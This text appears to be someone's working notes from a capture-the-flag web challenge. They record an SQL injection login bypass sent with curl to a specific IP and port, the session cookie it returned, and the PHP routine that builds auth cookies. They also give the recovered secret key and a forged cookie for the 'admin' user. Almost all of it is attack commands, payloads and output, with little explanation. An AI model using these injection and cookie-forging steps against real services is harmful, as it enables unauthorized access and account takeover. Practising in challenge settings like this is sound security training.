Obtain the ultimate dish!

curl -X POST -i 'http://52.49.91.111:8326/post-login?goodboy' --data 'POST /post-login?goodboy HTTP/1.1
Host: 52.49.91.111:8326
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://52.49.91.111:8326/?goodboy
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Upgrade-Insecure-Requests: 1

user=goodboy+OR+1%3D1&password=goodboy+OR+1%3D1'



auth cookie (post-login): 0c82c312c766e23720b76cd1255aa5ae
md5 of null string for user: d41d8cd98f00b204e9800998ecf8427e


document.cookie
"auth=0c82c312c766e23720b76cd1255aa5ae; {b1b8acdb-173c-4343-9e0d-d3d6122774f1}=value; {554b4a92-7f6d-42ff-ba90-6d04d61d4590}=value; {bf6d1b60-a7b7-4e4d-8c4d-e3cc345dad96}=value; {450a3811-940b-443e-b375-014e0c2811b9}=value; {cd41ed63-e99e-4cbe-a07f-f0918977be73}=value"



function create_auth_cookie($user)
{
    $authKey = get_auth_key();
    if (!$authKey) {
        return false;
    }
    $userMd5 = md5($user, true);

    $result = '';
    for ($i = 0; $i < strlen($userMd5); $i++) {
        $result .= bin2hex(chr((ord($authKey[$i]) + ord($userMd5[$i])) % 256));
    }
    return $result;
}

auth key:
38653739386630333737633939626330 b'8e798f0377c99bc0'



user: a
auth: 4426acf2f857e6db68fafc1ba2d98991



user: admin
auth: 59886662b2bdd5da7ac0ad4783e282f3